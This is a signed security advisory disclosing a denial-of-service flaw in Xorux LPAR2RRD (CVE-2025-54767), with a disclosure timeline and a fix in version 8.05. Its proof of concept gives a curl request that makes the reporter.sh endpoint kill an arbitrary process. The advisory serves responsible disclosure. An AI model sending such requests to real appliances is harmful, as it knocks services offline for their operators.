-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

KL-001-2025-014: Xorux LPAR2RRD Read Only User Denial of Service

Title: Xorux LPAR2RRD Read Only User Denial of Service
Advisory ID: KL-001-2025-014
Publication Date: 2025-07-28
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-014.txt


1. Vulnerability Details

     Affected Vendor: Xorux
     Affected Product: LPAR2RRD
     Affected Version: 8.04 and prior
     Platform: Rocky Linux 8.10
     CWE Classification: CWE-648: Incorrect Use of Privileged APIs
     CVE ID: CVE-2025-54767


2. Vulnerability Description

     An authenticated, read-only user can kill any processes running
     on the Xormon Original virtual appliance as the lpar2rrd user.


3. Technical Description

     The web application endpoint of
     https://<ip>/lpar2rrd-cgi/reporter.sh calls
     ../bin/reporter_cfg.pl, which contains a URL parameter command
     called "stop" which allows an attacker to specify a process ID
     (PID) to stop. The web application, running as the lpar2rrd
     user, then kills the process on the virtual appliance. This
     could be used to stop the webserver, the xormon.war web
     application or the lpar2rrd-daemon process, creating a denial
     of service (DoS) condition.


4. Mitigation and Remediation Recommendation

     Xorux released version 8.05, which includes a remediation
     for this vulnerability. See https://lpar2rrd.com/note800.php.


5. Credit

     This vulnerability was discovered by Jim Becher of KoreLogic,
     Inc.


6. Disclosure Timeline

     2025-07-17 : KoreLogic requests point-of-contact to securely
                  report several vulnerabilities to Xorux.
     2025-07-18 : Vendor provides support@xorux.com as the
                  point-of-contact, noting that they do not use PGP.
     2025-07-21 : KoreLogic submits this vulnerability and four
                  additional discoveries to Xorux.
     2025-07-23 : Vendor acknowledges receipt, stating that the issue
                  has been remediated and a new version of the
                  affected product will be available 2025-07-25.
     2025-07-25 : Xorux publishes updated version of the affected
                  product.
     2025-07-28 : KoreLogic public disclosure.


7. Proof of Concept

     On the Xormon Original virtual appliance:

         [lpar2rrd@xorux ~]$ ps -efww | grep lpar2rrd | grep bash
         lpar2rrd  185824  185823  0 May27 pts/0    00:00:00 -bash
         lpar2rrd 1777882  185824  0 13:40 pts/0    00:00:00 grep --color=auto bash
         [lpar2rrd@xorux ~]$

     From attacker box:

         attacker $ curl -k -H "Authorization: Basic amJlY2hlcjpqYmVjaGVy" 'https://172.31.255.207/lpar2rrd-cgi/reporter.sh?cmd=stop&pid=185824'
         {"status":"terminated"}

     On the Xormon Original virtual appliance:

         [lpar2rrd@xorux ~]$ Connection to 172.31.255.207 closed.
         attacker $


The contents of this advisory are copyright(c) 2025
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy
-----BEGIN PGP SIGNATURE-----

iQJOBAEBCAA4FiEEB12WYZwbVwYTJ/b2DKLsCTlWkekFAmiH/yMaHGRpc2Nsb3N1
cmVzQGtvcmVsb2dpYy5jb20ACgkQDKLsCTlWkekX2w//SR92X2NIg+rM7/ZjR5lA
qPlJconQlKRWbHlPFxb3FztRE4Mg45YzNt2TOixXeP9+lJjjZFQovKxtANB5sByb
l8vE9g9tXV6FNrVygYaKu+tpx5jzSmf5btDpA18AQPGG5JCQhNM5L2DT8efkYvu5
TG8mtLuk4LBcJOhXqvrC2Krzo3giDnyY3xNUI9sP2WVPTJzgf8ziZW1LNcwjs12r
QePA48DgGzJW9cLiuefhn0760D1229M5vXz9p6+Ru7UST3OZDoFawtMLkrru/cUa
DNJ6y5ULNsmUOAPjzizVPTGA5yBctcLyKNMD7gefq70elvot4c21doCjCR+Y3xm/
3w7RAckdfIOh0Ie5nENtezIH8GBjpjRT8nMw15Bfm/46bw3NHRGjScPSNPE5rhg5
AKzgRnbdiL55HzhBWj5w/BAHdzG0JDwHyC6Dq1LKG93YmtRxrkbRfHNweUR32DC+
0YJbSJilzKwBWtxRmd1QBBazqMN1g6EiXLZ3ONVhTRLoo2f9M+JYWFnP+8ZnSJ8B
NCRajQHag2uEw+EIokPZmo/7awuoq39Mp/VTVtYqwuGMPHjBCTVZGPH+doUwtpVI
8sZgA7lc5NqASd2kvXXl2TZxoF5oIHd2XSDhGNSfKuOVCcD3f2dzL3baFTOBdAFB
zZHbxq0mX/3yujSCIjzfb2Q=
=6q8N
-----END PGP SIGNATURE-----